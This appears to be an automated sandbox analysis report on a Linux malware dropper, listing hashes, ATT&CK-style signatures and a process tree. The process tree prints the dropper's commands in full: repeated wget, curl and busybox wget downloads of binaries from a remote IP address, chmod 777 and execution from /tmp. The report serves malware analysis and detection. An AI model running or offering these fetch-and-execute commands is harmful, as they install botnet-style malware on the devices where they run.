Analysis
-
max time kernel
13s -
max time network
15s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
09-11-2024 15:13
Static task
static1
Behavioral task
behavioral1
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-mipsel-20240729-en
General
-
Target
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
-
Size
10KB
-
MD5
8024f690eb7cff058a13d1d38f0b31c0
-
SHA1
c4be3a2eb04473145808dd1ce797dce7815d06dc
-
SHA256
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856
-
SHA512
9fa6258d021edb3a5423acb3c3d58dddad944e245b9f849a1f4ce16473b3976c29b7e07c4f171df4f4d8acd04988b6eba64c58a82ecf121b6c9756d10324ec9f
-
SSDEEP
192:+fEqq1c7X/8cm6S6m6W6D676ABfBga7X/8cI6S6m6W6D676wqqi:+fEqq1c7X/8c0BfBga7X/8cuqqi
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodpid process 698 chmod 725 chmod 744 chmod 774 chmod 786 chmod 792 chmod 798 chmod 681 chmod -
Executes dropped EXE 8 IoCs
Processes:
8ReStadMbCmEurUfQpyytOyHFmyODTgdGZpdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHKeFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEXLiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuoFQEOoM3X8lrwXw1WGkPq7AModrpioPpb3fF5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9HkgBUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ayioc pid process /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ 682 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK 700 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX 726 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo 745 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f 775 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg 787 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 793 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay 799 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay -
Checks CPU configuration 1 TTPs 8 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK curl File opened for modification /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX curl File opened for modification /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo curl File opened for modification /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f curl File opened for modification /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg curl File opened for modification /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 curl File opened for modification /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay curl File opened for modification /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ curl
Processes
-
/tmp/838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N/tmp/838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N1⤵PID:648
-
/bin/rm/bin/rm bins.sh2⤵PID:650
-
/usr/bin/wgetwget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:655
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:670 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:677
-
/bin/chmodchmod 777 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- File and Directory Permissions Modification
PID:681 -
/tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ./8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Executes dropped EXE
PID:682 -
/bin/rmrm 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:683
-
/usr/bin/wgetwget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:684
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:685 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:691
-
/bin/chmodchmod 777 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- File and Directory Permissions Modification
PID:698 -
/tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK./pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Executes dropped EXE
PID:700 -
/bin/rmrm pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:701
-
/usr/bin/wgetwget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:703
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:710 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:718
-
/bin/chmodchmod 777 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- File and Directory Permissions Modification
PID:725 -
/tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX./eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Executes dropped EXE
PID:726 -
/bin/rmrm eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:727
-
/usr/bin/wgetwget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:729
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:739 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:743
-
/bin/chmodchmod 777 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- File and Directory Permissions Modification
PID:744 -
/tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo./LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Executes dropped EXE
PID:745 -
/bin/rmrm LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:746
-
/usr/bin/wgetwget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:747
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:751 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:760
-
/bin/chmodchmod 777 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- File and Directory Permissions Modification
PID:774 -
/tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f./FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Executes dropped EXE
PID:775 -
/bin/rmrm FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:777
-
/usr/bin/wgetwget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:778
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:784 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:785
-
/bin/chmodchmod 777 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- File and Directory Permissions Modification
PID:786 -
/tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg./F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Executes dropped EXE
PID:787 -
/bin/rmrm F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:788
-
/usr/bin/wgetwget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:789
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:790 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:791
-
/bin/chmodchmod 777 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- File and Directory Permissions Modification
PID:792 -
/tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5./BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Executes dropped EXE
PID:793 -
/bin/rmrm BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:794
-
/usr/bin/wgetwget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:795
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:796 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:797
-
/bin/chmodchmod 777 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- File and Directory Permissions Modification
PID:798 -
/tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay./SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Executes dropped EXE
PID:799 -
/bin/rmrm SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:800
-
/usr/bin/wgetwget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:801
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97